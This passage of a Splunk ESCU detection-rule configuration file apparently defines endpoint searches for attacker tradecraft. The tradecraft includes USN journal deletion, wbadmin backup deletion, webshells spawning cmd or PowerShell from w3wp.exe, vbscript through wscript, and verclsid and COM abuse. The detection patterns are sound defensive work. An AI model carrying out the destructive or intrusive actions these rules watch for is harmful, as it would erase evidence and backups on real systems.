Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. Command lines that are extremely long may be indicative of malicious activity on your hosts. This search leverages the Machine Learning Toolkit (MLTK) to help identify command lines with lengths that are unusual for a given user. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Command lines that are extremely long may be indicative of malicious activity on your hosts. This search leverages the Machine Learning Toolkit (MLTK) to help identify command lines with lengths that are unusual for a given user. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate applications use long command lines for installs or updates. You should review identified command lines for legitimacy. You may modify the first part of the search to omit legitimate command lines from consideration. If you are seeing more results than desired, you may consider changing the value of threshold in the search to a smaller value. You should also periodically re-run the support search to re-build the ML model on the latest data. You may get unexpected results if the user identified in the results is not present in the data used to build the associated model. action.escu.creation_date = 2019-05-08 action.escu.modification_date = 2019-05-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusually Long Command Line - MLTK - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Unusually Long Command Line - MLTK - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| eval processlen=len(process) | search user!=unknown | apply cmdline_pdfmodel threshold=0.01 | rename "IsOutlier(processlen)" as isOutlier | search isOutlier > 0 | table firstTime lastTime user dest process_name process processlen count | `unusually_long_command_line___mltk_filter` [ESCU - User Discovery With Env Vars PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments that leverage PowerShell environment variables to identify the current logged user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments that leverage PowerShell environment variables to identify the current logged user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - User Discovery With Env Vars PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - User Discovery With Env Vars PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process="*$env:UserName*" OR Processes.process="*[System.Environment]::UserName*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `user_discovery_with_env_vars_powershell_filter` [ESCU - User Discovery With Env Vars PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the use of PowerShell environment variables to identify the current logged user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the use of PowerShell environment variables to identify the current logged user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - User Discovery With Env Vars PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - User Discovery With Env Vars PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*$env:UserName*" OR ScriptBlockText = "*[System.Environment]::UserName*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | rename Computer as dest, user_id as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `user_discovery_with_env_vars_powershell_script_block_filter` [ESCU - USN Journal Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = The fsutil.exe application is a legitimate Windows utility used to perform tasks related to the file allocation table (FAT) and NTFS file systems. The update sequence number (USN) change journal provides a log of all changes made to the files on the disk. This search looks for fsutil.exe deleting the USN journal. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The fsutil.exe application is a legitimate Windows utility used to perform tasks related to the file allocation table (FAT) and NTFS file systems. The update sequence number (USN) change journal provides a log of all changes made to the files on the disk. This search looks for fsutil.exe deleting the USN journal. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified action.escu.creation_date = 2018-12-03 action.escu.modification_date = 2018-12-03 action.escu.confidence = high action.escu.full_search_name = ESCU - USN Journal Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Log Manipulation", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Possible USN journal deletion on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - USN Journal Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The fsutil.exe application is a legitimate Windows utility used to perform tasks related to the file allocation table (FAT) and NTFS file systems. The update sequence number (USN) change journal provides a log of all changes made to the files on the disk. This search looks for fsutil.exe deleting the USN journal. action.notable.param.rule_title = USN Journal Deletion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process="*deletejournal*" AND process="*usn*" | `usn_journal_deletion_filter` [ESCU - Vbscript Execution Using Wscript App - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious wscript commandline to execute vbscript. This technique was seen in several malware to execute malicious vbs file using wscript application. commonly vbs script is associated to cscript process and this can be a technique to evade process parent child detections or even some av script emulation system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious wscript commandline to execute vbscript. This technique was seen in several malware to execute malicious vbs file using wscript application. commonly vbs script is associated to cscript process and this can be a technique to evade process parent child detections or even some av script emulation system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-10-01 action.escu.modification_date = 2021-10-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Vbscript Execution Using Wscript App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["FIN7", "Remcos", "AsyncRAT"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with commandline $process$ to execute vbsscript action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Vbscript Execution Using Wscript App - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7", "Remcos", "AsyncRAT"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious wscript commandline to execute vbscript. This technique was seen in several malware to execute malicious vbs file using wscript application. commonly vbs script is associated to cscript process and this can be a technique to evade process parent child detections or even some av script emulation system. action.notable.param.rule_title = Vbscript Execution Using Wscript App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "wscript.exe" AND Processes.parent_process = "*//e:vbscript*") OR (Processes.process_name = "wscript.exe" AND Processes.process = "*//e:vbscript*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `vbscript_execution_using_wscript_app_filter` [ESCU - Verclsid CLSID Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a possible abuse of verclsid to execute malicious file through generate CLSID. This process is a normal application of windows to verify the CLSID COM object before it is instantiated by Windows Explorer. This hunting query can be a good pivot point to analyze what is he CLSID or COM object pointing too to check if it is a valid application or not. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.012", "T1218"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a possible abuse of verclsid to execute malicious file through generate CLSID. This process is a normal application of windows to verify the CLSID COM object before it is instantiated by Windows Explorer. This hunting query can be a good pivot point to analyze what is he CLSID or COM object pointing too to check if it is a valid application or not. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = windows can used this application for its normal COM object validation. action.escu.creation_date = 2021-09-29 action.escu.modification_date = 2021-09-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Verclsid CLSID Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Verclsid CLSID Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.012", "T1218"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_verclsid` AND Processes.process="*/S*" Processes.process="*/C*" AND Processes.process="*{*" AND Processes.process="*}*" by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `verclsid_clsid_execution_filter` [ESCU - W3WP Spawning Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Baseline your environment before production. It is possible build systems using IIS will spawn cmd.exe to perform a software build. Filter as needed. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - W3WP Spawning Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyNotShell", "Data Destruction", "ProxyShell", "Hermetic Wiper", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Possible Web Shell execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - W3WP Spawning Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "Data Destruction", "ProxyShell", "Hermetic Wiper", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2021-34473", "CVE-2021-34523", "CVE-2021-31207"], "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable. action.notable.param.rule_title = W3WP Spawning Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=w3wp.exe AND `process_cmd` OR `process_powershell` by Processes.dest Processes.parent_process Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `w3wp_spawning_shell_filter` [ESCU - WBAdmin Delete System Backups - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for flags passed to wbadmin.exe (Windows Backup Administrator Tool) that delete backup files. This is typically used by ransomware to prevent recovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for flags passed to wbadmin.exe (Windows Backup Administrator Tool) that delete backup files. This is typically used by ransomware to prevent recovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may modify the boot configuration. action.escu.creation_date = 2021-01-22 action.escu.modification_date = 2021-01-22 action.escu.confidence = high action.escu.full_search_name = ESCU - WBAdmin Delete System Backups - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware", "Ransomware", "Prestige Ransomware", "Chaos Ransomware"] action.risk = 1 action.risk.param._risk_message = System backups deletion on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - WBAdmin Delete System Backups - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware", "Ransomware", "Prestige Ransomware", "Chaos Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for flags passed to wbadmin.exe (Windows Backup Administrator Tool) that delete backup files. This is typically used by ransomware to prevent recovery. action.notable.param.rule_title = WBAdmin Delete System Backups action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wbadmin.exe Processes.process="*delete*" AND (Processes.process="*catalog*" OR Processes.process="*systemstatebackup*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `wbadmin_delete_system_backups_filter` [ESCU - Wbemprox COM Object Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a potential suspicious process loading a COM object from wbemprox.dll or faskprox.dll. The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. This feature is being abused by several threat actors, adversaries or even red teamers to gain privilege escalation or even to evade detections. This TTP is a good indicator that a process is loading possible known .dll modules that were known for its COM object. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a potential suspicious process loading a COM object from wbemprox.dll or faskprox.dll. The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. This feature is being abused by several threat actors, adversaries or even red teamers to gain privilege escalation or even to evade detections. This TTP is a good indicator that a process is loading possible known .dll modules that were known for its COM object. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = legitimate process that are not in the exception list may trigger this event. action.escu.creation_date = 2021-06-02 action.escu.modification_date = 2021-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Wbemprox COM Object Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = Suspicious COM Object Execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wbemprox COM Object Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a potential suspicious process loading a COM object from wbemprox.dll or faskprox.dll. The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. This feature is being abused by several threat actors, adversaries or even red teamers to gain privilege escalation or even to evade detections. This TTP is a good indicator that a process is loading possible known .dll modules that were known for its COM object. action.notable.param.rule_title = Wbemprox COM Object Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded IN ("*\\fastprox.dll", "*\\wbemprox.dll", "*\\wbemcomn.dll") NOT (process_name IN ("wmiprvse.exe", "WmiApSrv.exe", "unsecapp.exe")) NOT(Image IN("*\\windows\\*","*\\program files*", "*\\wbem\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name dest EventCode Signed ProcessId Hashes IMPHASH | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wbemprox_com_object_execution_filter` [ESCU - Wermgr Process Connecting To IP Check Web Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1590", "T1590.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, dns query name process path , and query ststus from your endpoints like EventCode 22. If you are using Sysmon, you must have at least version 12 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-06-01 action.escu.modification_date = 2022-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Wermgr Process Connecting To IP Check Web Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = 